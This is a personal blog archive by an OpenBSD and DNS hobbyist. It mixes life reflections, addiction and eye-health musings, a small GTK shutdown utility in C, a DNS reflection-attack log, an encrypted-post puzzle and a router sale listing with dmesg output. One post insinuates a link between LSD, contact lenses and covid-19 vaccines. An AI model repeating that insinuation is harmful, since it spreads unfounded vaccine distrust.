still here. I have a lot of cardboard from amazon purchases too but I did throw
out the styrofoam in them. I don't think this is a mental illness it has to
do with my genes somehow, that would make you and I similar if you too are a
hoarder. I have a broken ipod, why don't I throw it out? Because it may
contain private things that another guy with clue can unlock and use. This is
my train of thought. While I do feel a bit sorry for myself in this I think
there is more to this story.
Open and Closed
February 16th, 2021
In a month is my birthday. I'm turning 45 years old. My successes were
mediocre in this lifespan, but I have made a giant contribution by open sourcing
delphinusdnsd from day one. I'm building on top of it soon, and soon I'm going
to turn to a closed source model, and I will try to protect my contribution
against others, unless they pay me money. Hopefully what I have planned will
make me money by the time I'm 60 which is in 15 years plus a month. I need
this money in order to retire because I've never had enough money to really
invest in retirement. I'm also hoping my health will stay good for the next
15 years. So what am I working on? In the plans is something that has to do
with DNS, clusters of servers and OpenBSD. Also my work in trying to port
my G5 to OpenBSD will be contained in this. My life is getting serious, I
can't afford to take too many side roads anymore. Of what's ahead I'll maybe
talk about it some more here. On to the next 15 years!
VW, Apple and cars from Asia
February 16th, 2021
In this article (slashdot.org) the VW CEO says he is
not worried. I think he should be. Apple has made swiss watchmakers and other
PDA makers like blackberry pretty upset and worried. I think we are in times
that a lot of key technologies are coming together. I read in popular mechanics
a long long time ago (35 years past) that cars from asia are gonna be shipped
to europe under the ice of the arctic by cargo submarines employing a MHD
drive (caterpillar drive / magnetohydrodynamic). This was a californian
fantasy since popular mechanics was a californian print. A ship with a
fusion reactor (lockheed claims they have one) could have enough power for a
MHD drive, and the route from asia to europe via arctic is short. Watch it
unfold before your eyes VW. It may happen.
A lost week
February 19th, 2021
I didn't get anything done this week. I was waiting on a part to replace a
broken usb3.0 hub. I got it and stuff started working again, but the part
should have arrive here on wednesday at the latest.
Open Source getting death threats
February 19th, 2021
I will
slaugher you is the threat that the author of curl got. Curl is a utility
that is widely used in the world. A company I worked for used curl in some
components of its network. It is widely known. This is an attack on open
source and I do hope Daniel S. goes to the police to report a death threat
against him.
What am I day-dreaming of? Mercury
February 24th, 2021
I'm astonished all the things that one needs for colonisation of Mercury are
in the Elon Musk suite of companies. Ie. Rockets and tunneling machines.
Because on Mercury you would land on a crater that has eternal darkness, which
are found at the poles. From there tunneling aparatus would be used to dig
out into the middle of the planet and hyperloops and mass drivers that
operate in tunnels to gather enough speed to lift payload off the planet.
Since Mercury has a slight atmosphere you can't just use these mass drivers
on the surface (mass drivers are like railguns). If tunnelling at quite a
depth from the surface is possible (1 km deep perhaps?), then caverns could
be erected underground that are bonded with hyperloops and that part of
Mercury is never really exposed by sunlight since it's easy to move everyone
to cooler parts with a hyperloop.
So what could be shot off from Mercury?
Raw materials to build space stations perhaps, the payload would bypass earth
and trade with Mars, Asteroid Belt, Callisto and Enceladus/Titan. What I
envision for the payload to be slung into space with the mass drivers and
there they would extract a solar sail to be pushed even faster into the
direction they're going. Another destination could be Venus where materials
are needed for building floating and non-floating cities. Perhaps Venus
could use some of the helium found on mercury, perhaps also ground stations
on Venus could use tunneling expertise. It is unclear wether Venus has life.
If it does have life that would put a damper on terraforming the planet.
Because who in their right mind wants to commit genocide on an alien species.
Mercury is on my mind lately, but so is Callisto which is the only moon of
Jupiter that humans can live on. But that's another story.
Cmdr Peter a Resistor
February 26th, 2021
Recently NASA used a funky code in the parachute on Mars for the Perseverance
Rover. I spelled DARE or something in binary. But textiles can have other
indicators such as colours. For a limited time only there is a colour code
at the top of this blog (front page).
You may have noticed the line at the blog where a HR html sign was before. This
line is colour coded after resistor colours. So my resistor code is Violet, Orange, Grey, Orange,
and optionally Violet again. It spells out 7383(7) or when you look up those
letters on your household phone pad P,E,T,E,(R). I'm commander Peter a
Resistor, welcome to my unit.
I know that a student of psychiatry in Halifax once asked me "is there a certain
colour you can't see?", making me wonder if they are searching for colour blind
people. I assure you I am capable of seeing the entire spectrum of colours
except with indigo right beside violet I have trouble with. Carry on!
x-shutdown, to shutdown in fluxbox
March 4th, 2021
I wrote this program called pass-calculator (gotweb) a
while ago. It's open sourced. Well I just minutely changed it to become a
shutdown program for shutting down the system in fluxbox. This prevents me
having to su to root and then type shutdown.
/*
* Copyright (c) 2021 Peter J. Philipp
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. The name of the author may not be used to endorse or promote products
* derived from this software without specific prior written permission
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
GtkWidget *window, *label, *result, *vbox, *table;
GtkWidget *reboot_window, *halt_window, *exit_window;
static void destroy(GtkWidget*, gpointer);
static void xreboot(GtkWidget*, gpointer);
static void xhalt(GtkWidget*, gpointer);
int
main(int argc, char *argv[])
{
if (pledge("stdio rpath dns unix exec", NULL) != 0) {
exit(1);
}
gtk_init(&argc, &argv);
window = gtk_window_new(GTK_WINDOW_TOPLEVEL);
gtk_window_set_title(GTK_WINDOW(window), "Shutdown Utility");
gtk_container_set_border_width(GTK_CONTAINER(window), 25);
gtk_widget_set_size_request(window, 600, 400);
vbox = gtk_vbox_new(FALSE, 6);
halt_window = gtk_button_new_with_mnemonic("Halt");
g_signal_connect(G_OBJECT(halt_window), "clicked", G_CALLBACK(xhalt), \
NULL);
gtk_button_set_relief(GTK_BUTTON(halt_window), GTK_RELIEF_NONE);
gtk_box_pack_start_defaults(GTK_BOX(vbox), halt_window);
/* reboot */
reboot_window = gtk_button_new_with_mnemonic("Reboot");
gtk_signal_connect(G_OBJECT(reboot_window), "clicked", \
G_CALLBACK(xreboot), NULL);
gtk_button_set_relief(GTK_BUTTON(reboot_window), GTK_RELIEF_NONE);
gtk_box_pack_start_defaults(GTK_BOX(vbox), reboot_window);
/* exit window */
exit_window = gtk_button_new_with_mnemonic("Cancel");
gtk_signal_connect(G_OBJECT(exit_window), "destroy", \
G_CALLBACK(destroy), NULL);
gtk_button_set_relief(GTK_BUTTON(exit_window), GTK_RELIEF_NONE);
g_signal_connect_swapped(G_OBJECT(exit_window), "clicked", \
G_CALLBACK(gtk_widget_destroy), (gpointer)window);
gtk_box_pack_start_defaults(GTK_BOX(vbox), exit_window);
gtk_container_add(GTK_CONTAINER(window), vbox);
gtk_widget_show_all(window);
gtk_main();
return (0);
}
static void
destroy(GtkWidget *window, gpointer data)
{
gtk_main_quit();
}
static void
xreboot(GtkWidget *window, gpointer data)
{
execl("/sbin/shutdown", "shutdown", "-r", "now", NULL);
}
static void
xhalt(GtkWidget *window, gpointer data)
{
execl("/sbin/shutdown", "shutdown", "-hp", "now", NULL);
}
I run this from a fluxbox menu with a doas command since setuid programs don't
work with GTK.
The headline is actually contradictive, it is intended to be so. I don't know
much about addiction other than that I have been addicted to a few things.
Probably not substances, but computer games, networked games in particular and
social media sites such as Internet Relay Chat. I'm actually writing this after
having quit EFnet IRC network after 25 years (twentyfive years, am I writing a
cheque?). Whether I stay away from efnet remains to be seen but a few key
persons have quit and now is a good time to quit. Actually I was nudged by
efnet with a K-line (a ban) this week so I didn't feel like contesting it or
return. I just said goodbye and that's that. I do see floaters in my vision
and this bothers me very much, because I keep thinking around being a fish with
a lighted tail bent backwards before its eyes hypnotizing it. This is a fish
that was presented as art (and it is art) in the OpenBSD theme of fish in the
ocean, these fish live near the bleeding edge layer of the ocean.
The floaters in my vision I only noticed them around 2000 if I can think back
so far. I went to an optometrist who had me look into a machine that took
dimensions of my cornea. He mentioned I have a lot of ingrown blood cells into
my cornea. This is attributable to daily wearing of the Johnson and Johnson
Dailys, that I wore since the mid-1990's. The contact lenses caused a loss
of blood to the cornea region due to not being too permeable (breathing plastic)
this to me makes perfect sense that I had ingrown blood arteries into my cornea.
Since about 2002 I have been wearing glasses since my optometrist also said
I had a slight astigmatism which cannot be adjusted with contacts. However the
glasses I had then I did not like very much, I dislike the tints. My glasses
now have a blue tint making me not see indigo colours all too well, next glasses
that I get will have no tint at all anymore.
Anyhow the floaters in my eyes cause me discomfort. It would be nice to have
technology to remove them, but I doubt that exists. I'm using linkedin more
now that I have left chat media, but it's just going from one media outlet
to another. I do hope that there is an escape from this all. Really I can
do well without linkedin, other than needing a job. We'll see.
Coincindentally I was reading on Hacker News the following
article on addiction (medium.com), I only skimmed it which I often
do anyhow, but I do remember the STNG show "the game", it is featured in a
photo at the bottom, if you can see it.
Psychology: depression to sex addiction?
March 6th, 2021
I'm trying to figure out a root cause to what is an addiction to dopamine.
One cheap way to get a dopamine hit is to fall into a cycle of sex addiction.
Which has a negative feedback of guilt and shame and cycles back on triggers
for the next dopamine hit. On top of that I'M taking anti-psychotics which
limit my dopamine. How can I get high?
Thinking back in my life it probably all started with a depression, but I'm
uncertain there may be genetic disorders associated to that. When I hit
puberty I all of a sudden discovered this function that would immediately
give me a dopamine and seratonin boost, at the detriment of guilt and shame.
Later in life I think I developed an intimacy disorder due to this. In my
life I never had a "true" relationship, only "flings" that lasted between
one day to two weeks to six months at the most. With age and being outside
of institutionalized hookups (school is a way to bring the sexes together),
I find it increasingly hard to find a special someone to share my life with,
because of this intimacy disorder. Usually it stops at the "hello" and we
go on in our lives.
At the same time I don't really want to "use" someone just for my sex addiction
to feed my dopamine habit. People are much too special for that. So I'm
trapped in a complex cycle that grew out of times of my puberty. How can I
get back to basically starting over? It's very difficult becuase I'm a male
that is 45 years old and I carried this burden with me for more than 30 years.
It has gotten out of control to say the least.
Why I fast forward through all the Royal stuff
March 11th, 2021
It's between the Royal Family and their own members. It's really a family
affair and it tarnishes the british crown. It's none of my business really
and I don't want to partake in it. Remember, the british crown is still
the richest family on earth, counting by land. Not sucking up to that, but
I feel the richer you are does not automatically make you open to all
internal problems.
Missing Persons
March 11th, 2021
Do you know a missing person? Have you ever come across a missing person?
What would you do if you did? Would you call the police immediately? Would
you try to rescue that person yourself? Would you tell that person that he
or she is registered as missing? Or would you even recognize them in the
first place? You can't blame someone for not recognizing a missing persons.
I'm retracting from this contract
March 13th, 2021
I once made a contract with a film maker named Mr. Hamilton. I signed a
contract. It's been 20 years now. I resign from this contract beginning
immediately. Thanks for all the fish!
Ciba Vision == Novartis corporation
March 14th, 2021
How would you feel about buying your set of glasses from the neighbourhood
drug dealer? Hmm, no way? Well how about buying contacts from Novartis
Corporation who in the
1930's manufactured LSD. Still feel good about those contacts?
When I heard that Johnson & Johnson (who is the Pepsi if Novartis was Coke)
made a covid-19 vaccine I immediately thought about my contacts. Because
Johnson & Johnson makes contacts, just like CIBA Vision aka Novartis also
makes contacts. Do a bit of research what the link is between LSD, contacts,
and covid-19 vaccines. Best Regards!
My optometrist told me
March 14th, 2021
Twenty years ago my optometrist told me that I had little blood vessels growing
into my cornea. We came to the conclusion it was from prolonged use of contact
lenses. The cornea is cut off from oxygen most likely and requires blood with
oxygen thus it creates blood passages to supply this. The contacts were likely
not gas-permeable that I had used. I stopped wearing contacts in 2005 or
thereabouts so it's been 15 years. I would highly recommend to anyone using
contacts to go see your optometrist (eye doctor) and check if you have an issue
with blood vessels growing into your cornea.
OpenBSD on RISC-V
March 16th, 2021
These guys ported OpenBSD to RISC-V.
Congratulations to Mars, Brian, Wenyan, and Shivam. Also congrats to Mike
Larkin who was friendly enough for letting me disturb the effort a little. I
really didn't disturb anything though, it was a rock solid effort.
With this work, OpenBSD has possibly support for RISC-V hardware, or very
little porting work is required. There is this rockin' board called the
SiFive Unmatched, which seems to have promise, for being used by hobbyists,
and people who like to program.
Happy St. Patricks day
March 17th, 2021
Today is the green beer day. How do they get that green into beer and rivers?
I suspect it comes from algae. Sorta like the stuff that swims in oceans.
Article 5 of the Universal Declaration of Human Rights states
March 19th, 2021
No one shall be subjected to torture or to cruel, inhuman or degrading
treatment or punishment.
I regret snowball fights
March 19th, 2021
A snowball thrown can be a vicious trajectory. I never aimed for the head
but the snowball found its own trajectory. It's snowing outside right now
and I think back to my youth, to snowball fights that took a wrong turn.
Sorry.
I'm seeing a lot of requests for "sl." (Sierra Leone)
March 20th, 2021
Lately I've been getting a lot of requests on my DNS servers for sl. Here is
an example
Mar 20 08:13:44 parallax delphinusdnsd[46935]: request on descriptor 10 interfac
e "168.119.124.130" from 82.29.CEN.SOR (ttl=240, region=2, tta=0.290ms) for "sl.
" type=ANY(255) class=1, edns0, answering "REFUSED" (31/31)
Mar 20 08:13:45 parallax delphinusdnsd[46935]: short circuiting multiple refused
from 82.29.CEN.SOR, drop
Mar 20 08:13:46 parallax last message repeated 2 times
If you've been watching your DNS logs (and you see these answers from me)
you may be a victim of a reflection
attack, as, my authoritative servers are just replying REFUSED to a possibly
spoofed source (you). I do have a "short circuit" which is sort of like a
rate limiting algorithm for these pesky queries. There is nothing that can
be done as replying REFUSED is appropriate in this case. Actually one thing
can be done, but it requires a worldwide effort to disallow forging IP's at
every egress point of a router. This is really easily said and not simply
done. Just ask the operators who oversaw shutting down smurf attacks how
simple their efforts were.
Dear Young Man, you forgot your trash
March 23rd, 2021
Bunch of guys were in the parking lot near my flat horsing around yesterday.
They forgot their trash. I just want to give them a friendly reminder that
they did so.
Open Systems and Open Concepts
March 26th, 2021
With open systems there is the misconception that when threatened by a closed
system that the open system must close itself. I'm sure there is countless
of ideas by philosophers out there that would keep open systems open and their
integrity intact without threatening the entire system as a whole. I don't
have that knowledge unfortunately, I've not practiced any academia of that
sort. But I invite you to show the world how open systems can defend themselves
when given the closed threat. Similarily there is order vs. chaos, which are
not the same things, but that approach has it's own advantages. Take the old
world vs. the new world for example. In the new world (america) all roads are
mostly straight, in europe the roads are mostly curvy and all over the place.
Having lived in both the old and the new world I can say when you have learned
one system it is difficult to adjust to another. One thing you'll see in
germany for example is mirrors at the side of roads so you can see a blind
spot. I would say that's just smoke and mirrors at best.
License change on my daemon (delphinusdnsd)
March 26th, 2021
I have changed the licensing for the first time in delphinusdnsd. It is now
free'er and more open (not 3-clause BSD anymore). It will allow someone to
say that Peter J. Philipp wrote that piece of software without specific prior
permission. I had the choice of GPL'ing the source but I don't think I want
to. GPL only has the benefit that someone has to share back modifications
they make on that particular piece of software.
You're bombarded with patches that you'd rather not want to mess with with that
sort of license model. I said from day one, make a fork of my program if you
want to code on it. I'll be the judge of importing things I deem fit to
use. Either way what is put in my code does protect me for liabilities
because of the license.
Where is my software being used? I had some interest from Russians in the
beginning phases of the daemon. Americans too had some interest. Lately
I have not had much interest that I could particularily pinpoint to any
region. I wouldn't be surprised if firewall makers use parts of my software
but that's just hypothesis.
This is goodbye (for now)
March 26th, 2021
I've been living in hell for 20 years now. I'm ready for another 20.
See you when I reincarnate.
Resurrection
September 21st, 2021
It's six months later and I'm resurrecting this blog, but with a twist.
Get your crypto breaking skills out and try to break this. It's also
found at the chargen port of pod.delphinusdns.org (port 19).
This crypto is like a chain in order to break it you must start at the
beginning. I'm sorry if this excludes you, but it's really quite simple.
Take your time I'm not going to write too much anymore. (At first).
If you come across me and see that this is encrypted you may want to give up
immediately. We have busy days and in the hustle and bustle it may not be in
your best interest to do a cryptanalysis granted if you even know how to do
that. Let me give you a few hints, and try to help you crack my words.
I use 2 algorithms and reuse passwords. One is a weaker algorithm and it can
be determined by identifying the first 2 characters of each crypto message. In
fact the stronger algorithm always starts with something like U2 and I would
not attempt to crack for its key. Use the weaker algorithm. I line each
password change with a weak algorithm to help you get pre- or post- knowledge
of a key. Also I would start very early (by now almost 100 messages back)
in the encrypted section of the blog because in one message I list a program
to help crack the weaker algorithm. It can be automated. I use only
words found in a english dictionary as key. That should then be very easy for
you if you want to invest a bit of time. Finally my words encrypted or not
may not be all that important, it depends on you if you see value in what I
write, or perhaps you are just interested in puzzles or cracking the hidden.
I may not repeat these words much but I thought I'd give a hint today anyhow
as a freebie. If you care not for my words, it's up to you, the headerline is
still not encrypted but I don't know if it gives you as much satisfaction.
I'm going to have two maintenances in the next two weeks. One is the
retirement of my OpenBSD/octeon router, which I will replace with vlan
plumbing on my switch and the raspberry pi 4b. I hope it works. This
may be on tuesday, thursday or friday of this week. I'm not going to do
this in off-hours since this is the Internet and I have a worldwide
audience (you).
The other maintenance will be for the new version of OpenBSD (7.3) which will
probably not constitute as much downtime. This will likely be after easter
monday. Hoping on tuesday or wednesday.
Update: A potential buyer has been found. Sorry to everyone else, it's as
good as gone. If the payment doesn't happen there may still be a chance so
keep watch for a few days. Thanks! Update 2: These are really APU1C's which the buyer has been made aware of I don't think they are APU1D's after all, if they still want it despite all's the same Update 3: edited the dmesg's a little to put in line breaks Update 4: the routers left my residence today at 18:00, there is no chance now to sell it to someone else. Thanks OpenBSD Community! I <3 U.
Dear European OpenBSD Community,
I'm selling off some used router gear (APU (amd64) and Ubiquiti (octeon))
and I thought it is fair to ask here first if you want to buy it.
I have 2 APU1C's with 2 GB and 4 GB RAM respectively both have a 30 GB or so
mSATA SSD in them, but no wifi. They each have 3 re(4) interfaces and are in
working order. I think I bought them between 2014 and 2016 from
https://www.apu-board.de/ . They probably don't have any more warrantee.
Also I'm parting with a Ubiquiti Networks Security Gateway which is
an OpenBSD/octeon computer. This one will do about 100 Mbit/s over PPPoE
but not much more than that. It has 512 MB of RAM and two cavium octeon cores.
For networking it sports three cnmac(4) ports.
These could be perfect for someone learning networking with BGP (perhaps) or
OSPF, or for support of these models. Also for home router setups they'll
work.
For students I'm asking 100 EUR for all three routers and for non-students
150 EUR. If you are interested and are a student I require a scan of your
student ID card if over the age of 18, and if under 18 I just require an ID
scan to prove your date of birth. Otherwise they'll cost 150 EUR.
Also I require you to pay shipping which departs from Schweinfurt, Germany to
your address (A donated macppc G4 Cube to Paris I think cost 25 EUR shipping
some years ago, the weight of all should be comparable to the cube). I'm
likely shipping with DHL which is across the street.
The three routers together comprise of:
1 Blue cased APU1C with 4 GB RAM
1 German powersupply (100-240V 50-60 Hz CE)
1 Red cased APU1C with 2 GB RAM
1 German powersupply (same as the one above)
1 Silver/white cased Security Gateway with 512 MB RAM
1 German powersupply matching this router
1 Blue Cisco-compatible cable (RJ45 to DB9) for the octeon
1 NULL modem cable (DB9 to DB9) for the APU's. (NRG systems calls these DE-9's)
All three routers have been upgraded to OpenBSD 7.3 and had their SSD filled
with /dev/random from beginning to end to wipe any traces of my previous
operations.
Here is dmesg's of the Red and Silver routers:
red# dmesg
OpenBSD 7.3 (GENERIC.MP) #1125: Sat Mar 25 10:36:29 MDT 2023
deraadt@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP
real mem = 2098524160 (2001MB)
avail mem = 2015592448 (1922MB)
random: good seed from bootblocks
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.7 @ 0x7e16d820 (7 entries)
bios0: vendor coreboot version "4.0" date 09/08/2014
bios0: PC Engines APU
acpi0 at bios0: ACPI 4.0
acpi0: sleep states S0 S1 S3 S4 S5
acpi0: tables DSDT FACP SPCR HPET APIC HEST SSDT SSDT SSDT
acpi0: wakeup devices AGPB(S4) HDMI(S4) PBR4(S4) PBR5(S4) PBR6(S4) PBR7(S4) \
PE20(S4) PE21(S4) PE22(S4) PE23(S4) PIBR(S4) UOH1(S3) UOH2(S3) UOH3(S3) \
UOH4(S3) UOH5(S3) [...]
acpitimer0 at acpi0: 3579545 Hz, 32 bits
acpihpet0 at acpi0: 14318180 Hz
acpimadt0 at acpi0 addr 0xfee00000: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: AMD G-T40E Processor, 1000.02 MHz, 14-02-00
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,HTT,SSE3,MWAIT,SSSE3,CX16,POPCNT,NXE,MMXX,\
FFXSR,PAGE1GB,RDTSCP,LONG,LAHF,CMPLEG,SVM,EAPICSP,AMCR8,ABM,SSE4A,MASSE,\
3DNOWP,IBS,SKINIT,ITSC
cpu0: 32KB 64b/line 8-way D-cache, 32KB 64b/line 2-way I-cache
cpu0: 512KB 64b/line 16-way L2 cache
cpu0: smt 0, core 0, package 0
mtrr: Pentium Pro MTRR support, 8 var ranges, 88 fixed ranges
cpu0: apic clock running at 200MHz
cpu0: mwait min=64, max=64, IBE
cpu1 at mainbus0: apid 1 (application processor)
cpu1: AMD G-T40E Processor, 1000.02 MHz, 14-02-00
cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,HTT,SSE3,MWAIT,SSSE3,CX16,POPCNT,NXE,MMXX,\
FFXSR,PAGE1GB,RDTSCP,LONG,LAHF,CMPLEG,SVM,EAPICSP,AMCR8,ABM,SSE4A,MASSE,\
3DNOWP,IBS,SKINIT,ITSC
cpu1: 32KB 64b/line 8-way D-cache, 32KB 64b/line 2-way I-cache
cpu1: 512KB 64b/line 16-way L2 cache
cpu1: smt 0, core 1, package 0
ioapic0 at mainbus0: apid 2 pa 0xfec00000, version 21, 24 pins
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus -1 (AGPB)
acpiprt2 at acpi0: bus -1 (HDMI)
acpiprt3 at acpi0: bus 1 (PBR4)
acpiprt4 at acpi0: bus 2 (PBR5)
acpiprt5 at acpi0: bus 3 (PBR6)
acpiprt6 at acpi0: bus -1 (PBR7)
acpiprt7 at acpi0: bus 5 (PE20)
acpiprt8 at acpi0: bus -1 (PE21)
acpiprt9 at acpi0: bus -1 (PE22)
acpiprt10 at acpi0: bus -1 (PE23)
acpiprt11 at acpi0: bus 4 (PIBR)
acpipci0 at acpi0 PCI0: 0x00000000 0x00000011 0x00000001
acpicmos0 at acpi0
acpibtn0 at acpi0: PWRB
acpicpu0 at acpi0: C2(0@100 io@0x841), C1(@1 halt!), PSS
acpicpu1 at acpi0: C2(0@100 io@0x841), C1(@1 halt!), PSS
cpu0: 1000 MHz: speeds: 1000 800 MHz
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "AMD 14h Host" rev 0x00
ppb0 at pci0 dev 4 function 0 "AMD 14h PCIE" rev 0x00: msi
pci1 at ppb0 bus 1
re0 at pci1 dev 0 function 0 "Realtek 8168" rev 0x06: RTL8168E/8111E \
(0x2c00), msi, address 00:0d:b9:3d:bb:fc
rgephy0 at re0 phy 7: RTL8169S/8110S/8211 PHY, rev. 4
ppb1 at pci0 dev 5 function 0 "AMD 14h PCIE" rev 0x00: msi
pci2 at ppb1 bus 2
re1 at pci2 dev 0 function 0 "Realtek 8168" rev 0x06: RTL8168E/8111E \
(0x2c00), msi, address 00:0d:b9:3d:bb:fd
rgephy1 at re1 phy 7: RTL8169S/8110S/8211 PHY, rev. 4
ppb2 at pci0 dev 6 function 0 "AMD 14h PCIE" rev 0x00: msi
pci3 at ppb2 bus 3
re2 at pci3 dev 0 function 0 "Realtek 8168" rev 0x06: RTL8168E/8111E \
(0x2c00), msi, address 00:0d:b9:3d:bb:fe
rgephy2 at re2 phy 7: RTL8169S/8110S/8211 PHY, rev. 4
ahci0 at pci0 dev 17 function 0 "ATI SBx00 SATA" rev 0x40: apic 2 int 19, \
AHCI 1.2
ahci0: port 0: 6.0Gb/s
scsibus1 at ahci0: 32 targets
sd0 at scsibus1 targ 0 lun 0: \
naa.50026b72540502a5
sd0: 28626MB, 512 bytes/sector, 58626288 sectors, thin
ohci0 at pci0 dev 18 function 0 "ATI SB700 USB" rev 0x00: apic 2 int 18, \
version 1.0, legacy support
ehci0 at pci0 dev 18 function 2 "ATI SB700 USB2" rev 0x00: apic 2 int 17
usb0 at ehci0: USB revision 2.0
uhub0 at usb0 configuration 1 interface 0 "ATI EHCI root hub" rev \
2.00/1.00 addr 1
ohci1 at pci0 dev 19 function 0 "ATI SB700 USB" rev 0x00: apic 2 int 18, \
version 1.0, legacy support
ehci1 at pci0 dev 19 function 2 "ATI SB700 USB2" rev 0x00: apic 2 int 17
usb1 at ehci1: USB revision 2.0
uhub1 at usb1 configuration 1 interface 0 "ATI EHCI root hub" rev \
2.00/1.00 addr 1
piixpm0 at pci0 dev 20 function 0 "ATI SBx00 SMBus" rev 0x42: SMI
iic0 at piixpm0
pcib0 at pci0 dev 20 function 3 "ATI SB700 ISA" rev 0x40
ppb3 at pci0 dev 20 function 4 "ATI SB600 PCI" rev 0x40
pci4 at ppb3 bus 4
ohci2 at pci0 dev 20 function 5 "ATI SB700 USB" rev 0x00: apic 2 int 18, \
version 1.0, legacy support
ppb4 at pci0 dev 21 function 0 "ATI SB800 PCIE" rev 0x00
pci5 at ppb4 bus 5
ohci3 at pci0 dev 22 function 0 "ATI SB700 USB" rev 0x00: apic 2 int 18, \
version 1.0, legacy support
ehci2 at pci0 dev 22 function 2 "ATI SB700 USB2" rev 0x00: apic 2 int 17
usb2 at ehci2: USB revision 2.0
uhub2 at usb2 configuration 1 interface 0 "ATI EHCI root hub" rev \
2.00/1.00 addr 1
pchb1 at pci0 dev 24 function 0 "AMD 14h Link Cfg" rev 0x43
pchb2 at pci0 dev 24 function 1 "AMD 14h Address Map" rev 0x00
pchb3 at pci0 dev 24 function 2 "AMD 14h DRAM Cfg" rev 0x00
km0 at pci0 dev 24 function 3 "AMD 14h Misc Cfg" rev 0x00
pchb4 at pci0 dev 24 function 4 "AMD 14h CPU Power" rev 0x00
pchb5 at pci0 dev 24 function 5 "AMD 14h Reserved" rev 0x00
pchb6 at pci0 dev 24 function 6 "AMD 14h NB Power" rev 0x00
pchb7 at pci0 dev 24 function 7 "AMD 14h Reserved" rev 0x00
usb3 at ohci0: USB revision 1.0
uhub3 at usb3 configuration 1 interface 0 "ATI OHCI root hub" rev \
1.00/1.00 addr 1
usb4 at ohci1: USB revision 1.0
uhub4 at usb4 configuration 1 interface 0 "ATI OHCI root hub" rev \
1.00/1.00 addr 1
isa0 at pcib0
isadma0 at isa0
com0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
com0: console
com1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
pcppi0 at isa0 port 0x61
spkr0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
wbsio0 at isa0 port 0x2e/2: NCT5104D rev 0x52
usb5 at ohci2: USB revision 1.0
uhub5 at usb5 configuration 1 interface 0 "ATI OHCI root hub" rev 1.00/1.00 addr 1
usb6 at ohci3: USB revision 1.0
uhub6 at usb6 configuration 1 interface 0 "ATI OHCI root hub" rev 1.00/1.00 addr 1
vmm0 at mainbus0: SVM/RVI
umass0 at uhub2 port 1 configuration 1 interface 0 "Generic Flash Card \
Reader/Writer" rev 2.01/1.00 addr 2
umass0: using SCSI over Bulk-Only
scsibus2 at umass0: 2 targets, initiator 0
sd1 at scsibus2 targ 1 lun 0: removable \
serial.058f6366058F63666485
vscsi0 at root
scsibus3 at vscsi0: 256 targets
softraid0 at root
scsibus4 at softraid0: 256 targets
root on sd0a (aaf0fa5294cd5915.a) swap on sd0b dump on sd0b
and silver(octeon):
Looking for valid bootloader image....
Jumping to start of image at address 0xbfc80000
U-Boot 1.1.1 (UBNT Build ID: 4674499-gfa58f5d) (Build time: Jun 9 \
2014 - 14:38:01)
BIST check passed.
UBNT_E120 r1:0, r2:16, f:8/135, serial #: fcecda048d68
MPR 13-02044-16
Core clock: 500 MHz, DDR clock: 266 MHz (532 Mhz data rate)
DRAM: 512 MB
Clearing DRAM....... done
Flash: 8 MB
Net: octeth0, octeth1, octeth2
USB: (port 0) scanning bus for devices... 1 USB Devices found
scanning bus for storage devices...
Device 0: Vendor: Prod.: UDinfo UF2 4GB Rev: PMAP
Type: Removable Hard Disk
Capacity: 3824.0 MB = 3.7 GB (7831552 x 512)
0
reading boot
..............
2876111 bytes read
argv[2]: numcores=2
ELF file is 64 bit
Allocating memory for ELF segment: addr: 0xffffffff82000000 \
(adjusted to: 0x2000000), size 0x2e5670
Allocated memory for ELF segment: addr: 0xffffffff82000000, size 0x2e5670
Processing PHDR 0
Loading 272200 bytes at ffffffff82000000
Clearing 73470 bytes at ffffffff82272200
## Loading Linux kernel with entry point: 0xffffffff82000000 ...
Bootloader: Done loading app on coremask: 0x3
>> OpenBSD/octeon BOOT 1.3
boot>
booting sd0a:/bsd
bootmem desc 0x24108 version 3.0
avail phys mem 0x00000000001004d0 - 0x0000000001000000
avail phys mem 0x00000000017ffc30 - 0x0000000001fffcd0
avail phys mem 0x0000000002000000 - 0x0000000008100000
avail phys mem 0x0000000008100010 - 0x000000000fffdc00
avail phys mem 0x0000000410000000 - 0x000000041ff00000
Total DRAM Size 0x0000000020000000
mem_layout[0] page 0x0000000000000041 -> 0x0000000000000400
